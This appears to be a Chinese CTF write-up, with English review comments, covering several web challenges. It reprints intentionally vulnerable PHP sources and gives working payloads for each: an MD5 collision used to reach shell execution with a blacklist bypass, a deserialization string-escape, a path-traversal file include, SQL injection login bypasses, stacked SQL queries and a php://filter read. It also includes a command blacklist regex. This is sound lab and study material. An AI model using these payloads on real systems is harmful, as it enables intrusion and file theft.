Easy Web
看师傅博客发现 img 参数的值是编码（而非加密）后的文件名：依次 base64 解码、base64 解码、再做 hex（base16）解码，得到的是一个图片文件名。
右键查看源代码可见图片是以 data: URI（base64）内嵌在 img 标签里的，说明服务端读取了该文件并把内容 base64 后回显。
按相反顺序（先 hex 编码，再两次 base64 编码）把 index.php 编码后作为 img 参数发送，即可读出源码。
index.php
<<?php
// NOTE(review): the opening tag above reads `<<?php` in this copy -- presumably a stray `<`
// introduced when the listing was pasted; PHP would emit that leading `<` as literal HTML.
//
// Challenge source: an arbitrary file read via `img`, plus shell execution of `cmd` behind a
// keyword blacklist, gated by an MD5 collision check on POST a/b.
//
// `||` is a boolean OR, so the argument evaluates to true, which coerces to 1 == E_ERROR:
// only fatal errors are reported. The intended mask is probably `E_ALL & ~E_NOTICE`.
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
// No exit() after the Refresh header: when a parameter is missing the rest of the script
// still runs with an empty $file / $cmd.
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// `img` is hex(filename), base64-encoded twice; the default value above decodes to "555.png".
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
// Everything outside [a-zA-Z0-9.] is stripped, so no "/" survives: only names relative to
// the script's working directory (e.g. index.php) can be requested.
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
// Only the *filename* is checked for "flag"; any other readable file is returned verbatim.
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
// Arbitrary file read: the filtered user-supplied name goes straight to file_get_contents()
// and the content comes back base64-encoded inside a data: URI.
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
// Reflected XSS: $_GET['cmd'] is echoed without any escaping.
echo $cmd;
echo "<br>";
// Command blacklist. NOTE(review): the backslash escapes of this pattern appear to have been
// lost in this copy (`"`, `*`, `?` are unescaped, so the line as printed would not even parse).
// In the working pattern the alternative written here as `\|\\` is an escaped `|` followed by
// an escaped `\`, i.e. it matches the two-character sequence "|\" and not a lone backslash --
// which is exactly what the `ca\t` bypass relies on.
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|'|"|`|;|,|*|?|\|\\|n|t|r|xA0|{|}|(|)|&[^d]|@|||\$|[|]|{|}|(|)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
// Strict comparison: a and b must be *different* strings with *identical* MD5 digests,
// i.e. a genuine MD5 collision pair. The "0e" magic-hash trick does not work against ===,
// because the hex digests themselves are compared as strings.
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
// RCE: $cmd is handed to the shell via backticks, restricted only by the blacklist above.
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
考查点：在 (string) 强制转换 + `===` 严格比较下的 MD5 碰撞——a、b 必须是内容不同但 md5 摘要完全相同的两个字符串；`0e` 开头的弱类型「魔术哈希」在这里无效，因为比较的是摘要字符串本身。
// Gate on an MD5 collision: a and b must differ as strings but hash identically under strict ===.
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
// Once the gate is passed, the GET parameter is executed by the shell.
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
网上搜集payload
// Known MD5 collision pair: two 64-byte blocks that differ in exactly two bytes
// (byte 36: %00 vs %02, byte 56: %55 vs %d5) yet produce the same digest (recorded below).
// They contain non-printable bytes, so they are kept URL-encoded here; when used against the
// challenge they must be sent URL-encoded in the POST body as a= and b=, not typed as text.
$a='%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2';
$b='%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2';
// Decode to the raw bytes before hashing -- md5() of the %-encoded text would not collide.
$a=urldecode($a);
$b=urldecode($b);
var_dump(md5($a));
var_dump(md5($b));
//008ee33a9d58b51cfeb425b0959121c9
//008ee33a9d58b51cfeb425b0959121c9
看一下这个正则
(preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|'|"|`|;|,|*|?|\|\\|n|t|r|xA0|{|}|(|)|&[^d]|@|||\$|[|]|{|}|(|)|-|<|>/i", $cmd))
|\|\\| //这个地方
//注意 `\|\\` 是一个分支：PCRE 里 `\|` 是字面的 `|`，紧跟的 `\\` 是字面的 `\`，所以它匹配的是连续两个字符 `|\`，而不是单独的 `\`。
//于是 cmd 里可以放反斜杠：`ca\t` 不命中 cat 黑名单，而 shell 去掉转义后执行的仍然是 cat；空格本身不在黑名单里，用 %20 传即可。
所以构造payload
cmd=ca\t%20/flag
Easy serialize
<?php
$function = @$_GET['f'];
/**
 * Strips the blacklisted keywords (case-insensitive) from the *serialized* session string.
 * Because it runs after serialize(), every removed match shortens a string value without
 * updating its s:N: length prefix -- the classic deserialization "string escape" primitive.
 * Note that 'php5' and 'php4' can never match as a whole: 'php' precedes them in the
 * alternation and is removed first, leaving the digit behind.
 */
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
// NOTE(review): no session_start() is visible in this listing; unless it happens elsewhere,
// $_SESSION here is just an ordinary array that is rebuilt on every request.
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
// Variable overwrite: extract() turns every POST key into a variable, so a body such as
// _SESSION[user]=...&_SESSION[function]=... replaces the whole $_SESSION array built above.
// This is what makes the serialized string attacker-controlled.
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
// img is either a fixed base64 constant or a sha1 hex digest, so it cannot be set directly
// to a chosen path; and because this runs after extract(), any _SESSION[img] from POST is
// overwritten again here.
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
// serialize() first, then filter(): removed keywords shrink the data but not the length
// prefixes, letting a crafted value escape its string and inject a new "img" element.
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
// The writeup reports that phpinfo() reveals d0g3_f1ag.php -- presumably through an ini
// setting shown there; nothing in this listing references that file directly.
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
// unserialize() of the tampered string, followed by an arbitrary file read of whatever
// base64-encoded path ends up in ['img'].
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
通过查看phpinfo() 发现d0g3_f1ag.php
file_get_contents()函数 正好可以读出来
base64_decode($userinfo['img'])=='d0g3_f1ag.php'
控制$userinfo['img']的值
序列化后 经过filter()函数 再进行反序列化赋值给$userinfo
这里 $_SESSION['img'] 要么是固定的 base64_encode('guest_img.png')，要么是 sha1() 散列（输出 40 位十六进制，base64_decode 后不可能得到 d0g3_f1ag.php），而且这段赋值在 extract($_POST) 之后执行，即使用 POST 覆盖 _SESSION[img] 也会被盖回去，所以无法直接控制 img。
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
这里考查字符串逃逸
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
正常序列后的内容
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:6:"huahua";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
现在我们要控制img里的内容为d0g3_f1ag.php 故序列化后的内容
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:6:"huahua";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
将这一串插进去
1";s:8:"function";s:6:"huahua";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
filter() 之前序列化的内容（user 用 6 个 flag 占 24 字节；注意末尾原有的 img 仍是 guest_img.png 的 base64，而不是我们注入的值）
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:70:"1";s:8:"function";s:6:"huahua";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
filter() 删掉 24 个字节的 flagflagflagflagflagflag 之后，s:24 的长度前缀不变，unserialize 就会把紧随其后的 24 个字符当作 user 的值，即吞掉
";s:8:"function";s:70:"1
随后真正被解析的是我们注入的 function 和 img（正好凑够 a:3 的 3 个元素），`;}` 提前闭合数组，原来的 img 被留在尾部忽略。
构造payload:
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=1";s:8:"function";s:6:"huahua";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
读出 d0g3_f1ag.php 后得知 flag 在 /d0g3_fllllllag；把该路径 base64 编码（L2QwZzNfZmxsbGxsbGFn，同样是 20 字节，s:20 不用改）替换 img 再发一次
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=1";s:8:"function";s:6:"huahua";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
[HCTF 2018]
WarmUp
<?php
highlight_file(__FILE__);
class emmm
{
/**
 * Whitelist check for the `file` request parameter (see the include at the bottom of the file).
 * Returns true when $page -- or a prefix of it -- equals one of the whitelisted filenames.
 *
 * The weakness: the second and third checks only validate the part *before* the first "?",
 * while the caller includes the full, untrimmed string. "source.php?../../x" therefore
 * passes here and is then used as an include path. The third check urldecode()s the value
 * first, so a "?" that arrives double-encoded (%253f) is accepted by that branch as well.
 *
 * @param string &$page the raw request value (taken by reference but never modified)
 * @return bool
 */
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
// Exact match against the whitelist values.
if (in_array($page, $whitelist)) {
return true;
}
// Substring up to the first "?": mb_strpos on "$page?" always finds one, so this is the
// whole string when no "?" is present.
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
// Same check after one extra round of URL decoding.
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
// Local file inclusion: $_REQUEST (GET, POST or COOKIE) supplies the path, checkFile() only
// validates the prefix before "?", and the full string is then included as-is. With
// file=source.php?../../../../../../ffffllllaaaagggg the whitelist passes while the include
// walks up the directory tree -- PHP appears to normalize the ".." components even though
// "source.php?" is not a real directory (confirm against the target's PHP version).
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
简单代码审计
走到 include 需要同时满足三个条件：
- file 不为空（!empty）
- file 是字符串（is_string）
- file 经过 emmm::checkFile() 校验后返回 true（不是「为空」——返回 false 就走 else 分支只输出图片）
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
三个if条件用第二个
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
第二个 if 只截取 ? 之前的部分赋给 $_page 做白名单校验，而 include 用的是完整字符串；由 hint.php 得知 flag 在 ffffllllaaaagggg 里，于是用 source.php? 通过白名单，再用 ../ 回到根目录直接包含 ffffllllaaaagggg
构造payload
file=source.php?../../../../../../ffffllllaaaagggg
[极客大挑战 2019]
Easy SQL
万能密码：用户名和密码都填 `'or''='`，闭合原来的引号后 `''=''` 恒为真，WHERE 条件永远成立
Have fun
右键源代码 ?cat=dog
[ACTF2020 新生赛]Include
文件包含：直接 include flag.php 会把它当代码执行而看不到内容，改用 php://filter 以 base64 读出源码，拿到的 base64 再解一次
php://filter/read=convert.base64-encode/resource=flag.php
[SUCTF 2019]EasySQL
-- Stacked statements (presumably separated by ";" in one request): switch the session into
-- PIPES_AS_CONCAT mode so that "||" stops being logical OR and becomes string concatenation,
-- after which `1||flag` returns "1" followed by the flag column.
select 1
set sql_mode=pipes_as_concat
select 1||flag from Flag
PIPES_AS_CONCAT 模式下 MySQL 把 || 当成字符串连接符（等价于 concat），而不是逻辑或，所以 1||flag 会把 flag 列的内容拼在 1 后面输出
-- Without touching sql_mode: "*" dumps every column, and "1||flag" stays a logical OR.
select *,1||flag From Flag;
# Evaluation: 1||flag is a logical OR (not XOR); 1 OR anything is 1, so this behaves like `select *,1 from Flag`.
# MySQL treats a non-numeric string as 0 in a boolean context: string OR string is 0, while 1 OR string is 1.